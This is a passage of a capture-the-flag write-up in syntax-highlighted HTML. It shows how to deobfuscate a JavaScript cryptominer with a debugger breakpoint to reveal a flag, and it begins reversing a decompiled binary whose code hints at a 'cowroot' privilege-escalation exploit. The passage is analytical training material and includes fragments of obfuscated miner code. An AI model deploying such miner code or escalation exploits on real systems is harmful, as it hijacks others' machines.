#EFF\">_0xe7588f<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">()[<\/span><span class=\"nx\" style=\"background: #263238;color: #EFF\">_0x32caef<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">-<\/span><span class=\"mh\" style=\"background: #263238;color: #F78C6C\">0x125<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">-<\/span><span class=\"mh\" style=\"background: #263238;color: #F78C6C\">0xf7<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span><span class=\"s1\" style=\"background: #263238;color: #C3E88D\">'q@iJ'<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">)<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">+<\/span><span class=\"nx\" style=\"background: #263238;color: #EFF\">_0x40bc9d<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"mh\" style=\"background: #263238;color: #F78C6C\">0xd6<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span><span class=\"s1\" style=\"background: #263238;color: #C3E88D\">'xMu*'<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span><span class=\"mh\" style=\"background: #263238;color: #F78C6C\">0x108<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">)](<\/span><span class=\"nx\" style=\"background: #263238;color: #EFF\">_0x32caef<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">-<\/span><span class=\"mh\" style=\"background: #263238;color: #F78C6C\">0x16f<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">-<\/span><span class=\"mh\" style=\"background: #263238;color: #F78C6C\">0x144<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span><span class=\"s1\" style=\"background: #263238;color: #C3E88D\">')ivL'<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">))){<\/span><span class=\"k\" style=\"background: #263238;color: #BB80B3\">return<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mh\" style=\"background: #263238;color: #F78C6C\">0x3<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">;}<\/span><span class=\"k\" style=\"background: #263238;color: #BB80B3\">if<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"nx\" style=\"background: #263238;color: #EFF\">_0xe7588f<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">()[<\/span><span class=\"nx\" style=\"background: #263238;color: #EFF\">_0x350ca5<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"mh\" style=\"background: #263238;color: #F78C6C\">0x349<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span><span class=\"mh\" style=\"background: #263238;color: #F78C6C\">0x372<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span><span class=\"s1\" style=\"background: #263238;color: #C3E88D\">'Bmc#'<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">)<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n...<span class=\"p\" style=\"background: #263238;color: #89DDFF\">&lt;<\/span><span class=\"nt\" style=\"background: #263238;color: #FF5370\">SNIP<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">&gt;<\/span>...\n<\/pre><\/div>\n\n\n\n<p>The contained <em>JavaScript<\/em>  should first be converted to a readable form by using e.g. \nan online <em>JavaScript<\/em> beautifier. Within the beautified code, we can find that function names\nwere not obfuscated:<\/p>\n\n\n\n<div class=\"codehilite\" style=\"background: #263238;color: #EFF\"><pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">...<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">&lt;<\/span><span class=\"nx\" style=\"background: #263238;color: #EFF\">SNIP<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">&gt;<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">...<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"k\" style=\"background: #263238;color: #BB80B3\">if<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"nx\" style=\"background: #263238;color: #EFF\">_0xa8d754<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"nx\" style=\"background: #263238;color: #EFF\">_0x268042<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">)<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">==<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"mh\" style=\"background: #263238;color: #F78C6C\">0x4<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">^<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mh\" style=\"background: #263238;color: #F78C6C\">0x7<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">))<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"nx\" style=\"background: #263238;color: #EFF\">startMining<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"nx\" style=\"background: #263238;color: #EFF\">_0x38ed76<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"nx\" style=\"background: #263238;color: #EFF\">_0xea05ff<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"nx\" style=\"background: #263238;color: #EFF\">_0x268042<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">),<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"nx\" style=\"background: #263238;color: #EFF\">_0x4c684f<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"nx\" style=\"background: #263238;color: #EFF\">_0x5921bb<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"nx\" style=\"background: #263238;color: #EFF\">_0x304de5<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">);<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"p\" style=\"background: #263238;color: #89DDFF\">...<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">&lt;<\/span><span class=\"nx\" style=\"background: #263238;color: #EFF\">SNIP<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">&gt;<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">...<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<\/pre><\/div>\n\n\n\n<p>The function <strong>startMining<\/strong> strikes the eye and one of its parameters should be an address to the wallet it is mining for.\nTo inspect the parameters we can edit the file and add a <strong>debugger<\/strong> statement. This creates a breakpoint and launches the\nbuild-in debugger of most common web browsers once the statement is reached.<\/p>\n\n\n\n<div class=\"codehilite\" style=\"background: #263238;color: #EFF\"><pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">...<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">&lt;<\/span><span class=\"nx\" style=\"background: #263238;color: #EFF\">SNIP<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">&gt;<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">...<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"k\" style=\"background: #263238;color: #BB80B3\">if<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"nx\" style=\"background: #263238;color: #EFF\">_0xa8d754<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"nx\" style=\"background: #263238;color: #EFF\">_0x268042<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">)<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">==<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"mh\" style=\"background: #263238;color: #F78C6C\">0x4<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">^<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mh\" style=\"background: #263238;color: #F78C6C\">0x7<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">))<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">{<\/span><span class=\"k\" style=\"background: #263238;color: #BB80B3\">debugger<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">;<\/span><span class=\"nx\" style=\"background: #263238;color: #EFF\">startMining<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"nx\" style=\"background: #263238;color: #EFF\">_0x38ed76<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"nx\" style=\"background: #263238;color: #EFF\">_0xea05ff<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"nx\" style=\"background: #263238;color: #EFF\">_0x268042<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">),<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"nx\" style=\"background: #263238;color: #EFF\">_0x4c684f<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"nx\" style=\"background: #263238;color: #EFF\">_0x5921bb<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"nx\" style=\"background: #263238;color: #EFF\">_0x304de5<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">);}<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"p\" style=\"background: #263238;color: #89DDFF\">...<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">&lt;<\/span><span class=\"nx\" style=\"background: #263238;color: #EFF\">SNIP<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">&gt;<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">...<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<\/pre><\/div>\n\n\n\n<p>Loading the modified <em>JavaScript<\/em> in a browser allows to investigate the arguments used for the <strong>startMinding<\/strong> function.\nWe find that the expression <strong>_0xea05ff(_0x268042)<\/strong> gets evaluated to <strong>USD{5FA6C9B90D2E863D4FAA}<\/strong>.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2022\/05\/js_debugger.png\" alt=\"Value of_0xea05ff(_0x268042)\" \/><\/figure>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\"><p>Note: The file was obfuscated using <a href=\"https:\/\/obfuscator.io\/\" target=\"_blank\" rel=\"noopener\">https:\/\/obfuscator.io\/<\/a> and prevents any calls to <strong>Console.log<\/strong>.<\/p><\/blockquote>\n\n\n\n<p><\/p>\n\n\n\n<h4 class=\"wp-block-heading\"><a id=\"flag-4-reversing-an-exploit\"><\/a>Flag 4: Reversing an exploit<\/h4>\n\n\n\n<p>Also in the <strong>tool<\/strong> directory we find a binary called cat. First we decompile the program using <strong>ghidra<\/strong>:<\/p>\n\n\n\n<div class=\"codehilite\" style=\"background: #263238;color: #EFF\"><pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span><span class=\"c1\" style=\"background: #263238;color: #546E7A;font-style: italic\">\/\/ main function<\/span>\n<span class=\"kt\" style=\"background: #263238;color: #BB80B3\">void<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"nf\" style=\"background: #263238;color: #82AAFF\">FUN_0010174c<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">undefined8<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">param_1<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span><span class=\"kt\" style=\"background: #263238;color: #BB80B3\">long<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">param_2<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">)<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"p\" style=\"background: #263238;color: #89DDFF\">{<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"kt\" style=\"background: #263238;color: #BB80B3\">int<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">iVar1<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">;<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"kt\" style=\"background: #263238;color: #BB80B3\">long<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">in_FS_OFFSET<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">;<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">undefined<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">local_a0<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">8<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">];<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"kt\" style=\"background: #263238;color: #BB80B3\">size_t<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">local_98<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">;<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"kt\" style=\"background: #263238;color: #BB80B3\">size_t<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">local_90<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">;<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"kt\" style=\"background: #263238;color: #BB80B3\">char<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">*<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">local_88<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">;<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"kt\" style=\"background: #263238;color: #BB80B3\">char<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">*<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">local_80<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">;<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"kt\" style=\"background: #263238;color: #BB80B3\">size_t<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">local_78<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">;<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"kt\" style=\"background: #263238;color: #BB80B3\">char<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">*<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">local_70<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">;<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">undefined4<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">local_68<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">;<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">undefined<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">local_64<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">;<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">undefined8<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">local_10<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">;<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n\n<span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">local_10<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">*<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">undefined8<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">*<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">)(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">in_FS_OFFSET<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">+<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mh\" style=\"background: #263238;color: #F78C6C\">0x28<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">);<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"c1\" style=\"background: #263238;color: #546E7A;font-style: italic\">\/\/ param_2 == argv[1] -&gt; input string<\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">local_90<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">strlen<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">*<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"kt\" style=\"background: #263238;color: #BB80B3\">char<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">**<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">)(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">param_2<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">+<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">8<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">));<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\">  <\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"c1\" style=\"background: #263238;color: #546E7A;font-style: italic\">\/\/ apply some function to the string<\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">local_88<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"kt\" style=\"background: #263238;color: #BB80B3\">char<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">*<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">)<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">FUN_00101231<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">*<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">undefined8<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">*<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">)(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">param_2<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">+<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">8<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">),<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">local_90<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">local_a0<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">);<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\">  <\/span>\n\n<span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">iVar1<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">strcmp<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">local_88<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span><span class=\"s\" style=\"background: #263238;color: #C3E88D\">\"SDt+TLwfFUF8t9xUR+S9tIsOQUkJSjoHTVJ=\"<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">);<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"k\" style=\"background: #263238;color: #BB80B3\">if<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">iVar1<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">==<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">0<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">)<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">{<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\">     <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">local_80<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"s\" style=\"background: #263238;color: #C3E88D\">\"snScFCw6EV+6RnScGCseRUN=\"<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">;<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\">     <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">local_78<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">strlen<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"s\" style=\"background: #263238;color: #C3E88D\">\"snScFCw6EV+6RnScGCseRUN=\"<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">);<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\">     <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">local_98<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">strlen<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">local_80<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">);<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\">     <\/span><span class=\"c1\" style=\"background: #263238;color: #546E7A;font-style: italic\">\/\/ decode some strings?<\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\">     <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">local_70<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"kt\" style=\"background: #263238;color: #BB80B3\">char<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">*<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">)<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">FUN_00101479<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">local_80<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">local_78<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">&amp;<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">local_98<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">);<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\">     <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">printf<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">local_70<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">);<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\">     <\/span><span class=\"c1\" style=\"background: #263238;color: #546E7A;font-style: italic\">\/\/ call cowroot<\/span>\n<span 